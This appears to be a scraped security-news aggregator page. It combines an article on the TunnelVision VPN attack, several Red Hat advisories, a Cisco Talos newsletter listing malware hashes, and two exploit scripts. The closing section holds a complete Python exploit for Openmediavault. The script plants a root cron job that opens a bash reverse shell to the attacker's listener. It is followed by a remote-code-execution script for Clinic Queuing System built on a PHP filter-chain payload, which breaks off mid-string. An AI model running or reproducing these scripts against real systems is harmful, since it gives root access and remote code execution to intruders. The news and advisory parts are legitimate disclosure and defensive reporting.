TunnelVision is an attack developed by researchers that can expose VPN traffic to snooping or tampering.

Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address. The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user's VPN runs on Linux or Android. They also said their attack technique may have been possible since 2002 and may already have been discovered and used in the wild since then.

**Reading, Dropping, or Modifying VPN Traffic**

The effect of TunnelVision is that “the victim's traffic is now decloaked and being routed through the attacker directly,” a video demonstration explained. “The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the internet.”

The attack works by manipulating the DHCP server that allocates IP addresses to devices trying to connect to the local network. A setting known as option 121 allows the DHCP server to override default routing rules that send VPN traffic through a local IP address that initiates the encrypted tunnel. By using option 121 to route VPN traffic through the DHCP server, the attack diverts the data to the DHCP server itself. Researchers from Leviathan Security explained:

> Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway. When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.
> 
> We use DHCP option 121 to set a route on the VPN user’s routing table. The route we set is arbitrary and we can also set multiple routes if needed. By pushing routes that are more specific than a /0 CIDR range that most VPNs use, we can make routing rules that have a higher priority than the routes for the virtual interface the VPN creates. We can set multiple /1 routes to recreate the 0.0.0.0/0 all traffic rule set by most VPNs.
> 
> Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface. This is intended functionality that isn’t clearly stated in the RFC. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.
> 
> We now have traffic being transmitted outside the VPN’s encrypted tunnel. This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server. We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.

The attack can most effectively be carried out by a person who has administrative control over the network the target is connecting to. In that scenario, the attacker configures the DHCP server to use option 121. It’s also possible for people who can connect to the network as an unprivileged user to perform the attack by setting up their own rogue DHCP server.

The attack allows some or all traffic to be routed through the unencrypted tunnel. In either case, the VPN application will report that all data is being sent through the protected connection. Any traffic that’s diverted away from this tunnel will not be encrypted by the VPN and the internet IP address viewable by the remote user will belong to the network the VPN user is connected to, rather than one designated by the VPN app.

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn't implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) A VPN user connecting to an untrusted network has no ability to control the firewall, and (2) it opens the same side channel present with the Linux mitigation.

The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the internet through the Wi-Fi network of a cellular device. The research, from Leviathan Security researchers Lizzie Moratti and Dani Cronce, is available here.

_This story originally appeared on_ _Ars Technica._

‘TunnelVision’ Attack Leaves Nearly All VPNs Vulnerable to Spying

Red Hat Security Advisory 2024-2799-03 - An update for glibc is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer overflow, code execution, null pointer, and out of bounds write vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2799.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: glibc security updateAdvisory ID:        RHSA-2024:2799-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2799Issue date:         2024-05-09Revision:           03CVE Names:          CVE-2024-2961====================================================================Summary: An update for glibc is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.Security Fix(es):* glibc: Out of bounds write in iconv may lead to remote code execution (CVE-2024-2961)* glibc: stack-based buffer overflow in netgroup cache (CVE-2024-33599)* glibc: null pointer dereferences after failed netgroup cache insertion (CVE-2024-33600)* glibc: netgroup cache may terminate daemon on memory allocation failure (CVE-2024-33601)* glibc: netgroup cache assumes NSS callback uses in-buffer strings (CVE-2024-33602)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2961References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2273404https://bugzilla.redhat.com/show_bug.cgi?id=2277202https://bugzilla.redhat.com/show_bug.cgi?id=2277204https://bugzilla.redhat.com/show_bug.cgi?id=2277205https://bugzilla.redhat.com/show_bug.cgi?id=2277206

Red Hat Security Advisory 2024-2799-03

Red Hat Security Advisory 2024-2793-03 - An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2793.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: nodejs:16 security updateAdvisory ID:        RHSA-2024:2793-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2793Issue date:         2024-05-09Revision:           03CVE Names:          CVE-2024-22019====================================================================Summary: An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-22019References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264574

Red Hat Security Advisory 2024-2793-03

Red Hat Security Advisory 2024-2671-03 - Red Hat build of MicroShift release 4.14.24 is now available with updates to packages and images that fix several bugs. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2671.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat build of MicroShift 4.14.24 security update  
Advisory ID:        RHSA-2024:2671-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2671  
Issue date:         2024-05-09  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat build of MicroShift release 4.14.24 is now available with updates  
to packages and images that fix several bugs.

This release includes a security update for Red Hat build of MicroShift 4.14.24.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

Description:

Red Hat build of MicroShift is Red Hat's light-weight Kubernetes  
orchestration solution designed for edge device deployments and is built  
from the edge capabilities of Red Hat OpenShift. MicroShift is an  
application that is deployed on top of Red Hat Enterprise Linux devices at  
the edge, providing an efficient way to operate single-node clusters in  
these low-resource environments.

This advisory contains the RPM packages for Red Hat build of MicroShift  
4.14.24. Read the following advisory for the container images for this  
release:

https://access.redhat.com/errata/RHSA-2024:2668

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All of the bug fixes may not be documented in this advisory. Read the  
following release notes documentation for details about these changes:

https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.14/html/release_notes/index

All Red Hat build of MicroShift 4.14 users are advised to use these updated  
packages and images when they are available in the RPM repository.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.14/html/release_notes/index

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2671-03

Red Hat Security Advisory 2024-2667-03 - Red Hat build of MicroShift release 4.15.12 is now available with updates to packages and images that include a security update.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2667.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat build of MicroShift 4.15.12 security updateAdvisory ID:        RHSA-2024:2667-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2667Issue date:         2024-05-09Revision:           03CVE Names:          CVE-2023-45288====================================================================Summary: Red Hat build of MicroShift release 4.15.12 is now available with updates to packages and images that include a security update.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built from the edge capabilities of Red Hat OpenShift. MicroShift is an application that is deployed on top of Red Hat Enterprise Linux devices at the edge, providing an efficient way to operate single-node clusters in these low-resource environments.This advisory contains the RPM packages for Red Hat build of MicroShift 4.15.12. Read the following advisory for the container images for this release:https://access.redhat.com/errata/RHSA-2024:2664For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_build_of_microshift/4.15/html/release_notes/indexCVEs:CVE-2023-45288References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268273

Red Hat Security Advisory 2024-2667-03

Under a pilot program, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s KEV catalog.

Thursday, May 9, 2024 14:00

One of the great cybersecurity challenges organizations currently face, especially smaller ones, is that they don’t know what they don’t know. 

It’s tough to have your eyes on everything all the time, especially with so many pieces of software running and IoT devices extending the reach of networks broader than ever.  

One potential (and free!) solution seems to be a new program from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) that alerts companies and organizations of unpatched vulnerabilities that attackers could exploit.  

Under a pilot program that’s been running since January 2023, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog. For those that don’t know, the KEV catalog consists of any security issues that threat actors are known to actively exploit in the wild, and often include some of the most serious vulnerabilities disclosed on a regular basis, some of which have been around for years. 

Jen Easterly, CISA’s director, said last month that 49 percent of those vulnerabilities that CISA sent alerts about were mitigated — either through patching or other means. The program will launch in earnest later this year, but more than 7,000 organizations have already registered for the pilot program. 

Everything about this makes sense to me — it comes at no cost to the consumer or business, it allows the government to inform organizations of something they very likely aren’t aware of, and these issues are easy enough to fix with software or hardware patches.  

I’m mainly wondering how we’ll get more potential targets to sign up for this program and receive these alerts. 

According to CISA’s web page on the program, the alerts are only currently available to “Federal, state, local, tribal and territorial governments, as well as public and private sector critical infrastructure organizations.” 

I would imagine that, at some point, the scope of this will be expanded if it continues to be successful, and there are no clear guidelines for what “critical infrastructure” means in this context, exactly. (For example, would something like a regional ISP would be eligible for this program? I’d consider this CI, but I’m not sure the federal government would.) 

Currently, signing up for the alerts seems to be as simple as sending an email. CISA’s also been sending alerts to any vulnerable systems that appear on Shodan scans. I don’t think there’s a way to make something like this compulsory unless it’s codified into law somewhere, but it almost seems like it should be. 

Who wouldn’t want to just get free alerts from the federal government telling you when your network has a vulnerability that’s being exploited in the wild? For many of the local and state government teams, the pilot program targets are understaffed and underfunded, and sometimes the act of patching can get so overwhelming that it can take months to keep current. But this type of organization may also be stretched thin to the point they haven’t even heard of this program from CISA. So if the most I can do is shout out this government program in this newsletter and one extra company signs up, I’ll feel good about that.  

**The one big thing **

Cisco Talos’ Vulnerability Research team recently disclosed three zero-day vulnerabilities two of which are still unpatched as of Wednesday, May 8. Two vulnerabilities in this group — one in the Tinyroxy HTTP proxy daemon and another in the stb\_vorbis.c file library — could lead to arbitrary code execution, earning both issues a CVSS score of 9.8 out of 10. While we were unable to reach the maintainers, the Tinyproxy maintainers have since patched the issue. Another zero-day exists in the Milesight UR32L wireless router. These vulnerabilities have all been disclosed in adherence to Cisco’s third-party vulnerability disclosure timeline after the associated vendors did not meet the 90-day deadline for a patch or communication.   

**Why do I care? **

Tinyproxy is meant to be used in smaller networking environments. It was originally released more than a dozen years ago. A use-after-free vulnerability, TALOS-2023-1889 (CVE-2023-49606), exists in the \`Connection\` header provided by the client. An adversary could make an unauthenticated HTTP request to trigger this vulnerability, setting off the reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. Four of these issues that Talos disclosed this week still do not have patches available, so anyone using affected software should find other potential mitigations. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Several international law enforcement agencies have identified, sanctioned and indicted the alleged leader of the LockBit ransomware group.** Russian national Dmitry Yuryevich Khoroshev has been unmasked as the person behind the operator of the username “LockBitSupp,” LockBit’s creator and mastermind. The ransomware group has extorted an estimated $500 million from its victims over its several years of activity. Khoroshev allegedly took 20 percent of each ransom payment and operated the group’s data leak site. The U.S. federal government is offering up to a $10 million reward for anyone who can provide information leading to Khoroshev’s arrest. In all, he is charged with 26 crimes in the U.S. that carry a maximum punishment of 185 years in prison. LockBit, founded around 2018, operates under the ransomware-as-service model in which other actors can pay to access LockBit’s malware and infection tools. The group has been linked to several major ransomware attacks over the years, including against the U.K.’s Royal Mail service, a small Canadian town in Ontario and a children’s hospital in Chicago. (Wired, The Verge) 

**The U.K. blamed Chinese state-sponsored actors for a recent data breach at a military contractor that led to the theft of personal information belonging to around 270,000 members of the British armed forces.** Potentially affected information includes names and banking information for full-time military personnel and part-time reservists, as well as veterans who left the military after January 2018. Some of those affected are also current members of parliament. A top official at the U.K.’s Ministry of Defense called the breach a “very significant matter” and that the contractor immediately took the affected systems offline. While the British government has yet to formally attribute the attack to a specific threat actor, several reports indicate they believe an actor emanating from China was responsible. While the actors may have been present on the network for up to weeks, there is currently no evidence that the information was copied or removed. (The Guardian, Financial Times) 

**Security researchers found a new attack vector that could allow bad actors to completely negate the effect of VPNs.** The method, called “TunnelVision,” can force VPN services to send or receive some or all traffic outside of the encrypted tunnel they create. Traditionally users will rely on VPNs to protect their traffic from snooping or tampering, or to hide their physical locations. The researchers believe TunnelVision affects every VPN application available if it connects to an attacker-controlled network. There is currently no way to avoid or bypass these attacks unless the VPN runs on Linux or Android. TunnelVision has been possible since at least 2002, though it's unclear how often it's been used in the wild. VPN users who are concerned about this attack can run their VPN inside a virtual machine whose network adapter isn’t in bridged mode or connect via the Wi-Fi network of a cellular device. However, for the attack to be effective, the attacker would need complete control over a network. If a connection is affected, though, the user would be completely unaware, and the VPN would not alert them to a change. (Ars Technica, ZDNet) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #182: 4 takeaways from what Talos IR is seeing in the field 
*   ClamAV 1.4.0 release candidate now available! 
*   Critical Tinyproxy Flaw Opens Over 50,000 Hosts to Remote Code Execution 
*   Vulnerabilities in employee management system could lead to remote code execution, login credential theft 

**Upcoming events where you can find Talos **

**ISC2 SECURE Europe** **(May 29)** 

_Amsterdam, Netherlands_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent._  

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** W32.File.MalParent 

**SHA 256:** d529b406724e4db3defbaf15fcd216e66b9c999831e0b1f0c82899f7f8ef6ee1   
**MD5:** fb9e0617489f517dc47452e204572b4e   
**Typical Filename:** KMSAuto++.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

A new alert system from CISA seems to be effective — now we just need companies to sign up

Openmediavault versions prior to 7.0.32 have a vulnerability that occurs when users in the web-admin group enter commands on the crontab by selecting the root shell. As a result of exploiting the vulnerability, authenticated web-admin users can run commands with root privileges and receive reverse shell connections.

    # Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation# Date: 08.05.2024# Exploit Author: Mert BENADAM# Vendor Homepage: https://www.openmediavault.org/# Software Link: https://sourceforge.net/projects/openmediavault/# Version: < 7.0.32# Tested on: OMV 7.0.32 & 6.5 @Virtual Machine# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.# Special Thx: k3yZ :)"""PoC:This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell.As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections.It can also be used in privilege escalation attacks on local systems."""import argparseimport requestsimport jsondef login(ip_address, username, password, lhost, lport):    try:        login_data = {            "service": "Session",            "method": "login",            "params": {                "username": username,                "password": password            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=login_data)        if response.status_code == 200:            print("Login Success , Checking User Privilages...")            post_check(ip_address, response.cookies, lhost , lport)        else:            print("login Failed, Probably Wrong User Credentials...")            print("Reason:")            print(response.json())    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def post_check(ip_address, cookies, lhost, lport):    try:        post_data = {            "service": "Cron",            "method": "getList",            "params": {                "type": ["userdefined"],                "start": 0,                "limit": -1            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Accesing Crons...OK")            send_post(ip_address, cookies, lhost , lport)        elif response.status_code == 403:            print("Kullanıcı yetkili değil.")        else:            print("Post Request Failure...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Beklenmeyen bir hata oluştu:", e)def send_post(ip_address, cookies, lhost , lport):    try:        post_data = {            "service": "Cron",            "method": "set",            "params": {                "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4",  # UUID                "enable": True,                "execution": "exactly",                "minute": ["*"],                "everynminute": False,                "hour": ["*"],                "everynhour": False,                "dayofmonth": ["*"],                "everyndayofmonth": False,                "month": ["*"],                "dayofweek": ["*"],                "username": "root",                "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'",  # Command From User                "sendemail": False,                "comment": "",                "type": "userdefined"            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Payload Sent... OK,")            update(ip_address, cookies)        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Something Wrong.CHECK your version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def update(ip_address, cookies):    try:        post_data = {            "service": "Config",            "method": "applyChangesBg",            "params": {                "modules": [],                "force": False            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Updating crontabs...")            print("Successfully Exploited...")            print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...")            print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...")        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Someting Wrong. Check version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def main():    font="""███╗   ██╗ ██████╗ ███╗   ███╗███████╗██████╗  ██████╗██╗   ██╗ ██████╗  ██████╗████╗  ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗██╔██╗ ██║██║   ██║██╔████╔██║█████╗  ██████╔╝██║      ╚████╔╝ ██║██╔██║██║██╔██║██║╚██╗██║██║   ██║██║╚██╔╝██║██╔══╝  ██╔══██╗██║       ╚██╔╝  ████╔╝██║████╔╝██║██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║  ██║╚██████╗   ██║   ╚██████╔╝╚██████╔╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝    ╚═════╝  ╚═════╝    """    parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilage Escalation")    parser.add_argument("-U", "--ip", type=str, help="Victim Ip Adress", required=False)    parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False)    parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False)    parser.add_argument("-L", "--lhost", type=str, help="Listener IP Adress For Reverse Shell", required=False)    parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False)    args = parser.parse_args()    if args.ip and args.username and args.password and args.lhost and args.lport:        print(font)        login(args.ip, args.username, args.password, args.lhost , args.lport)    else:        print(font)        parser.print_help()if __name__ == "__main__":    main()

Openmediavault Remote Code Execution / Local Privilege Escalation

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHA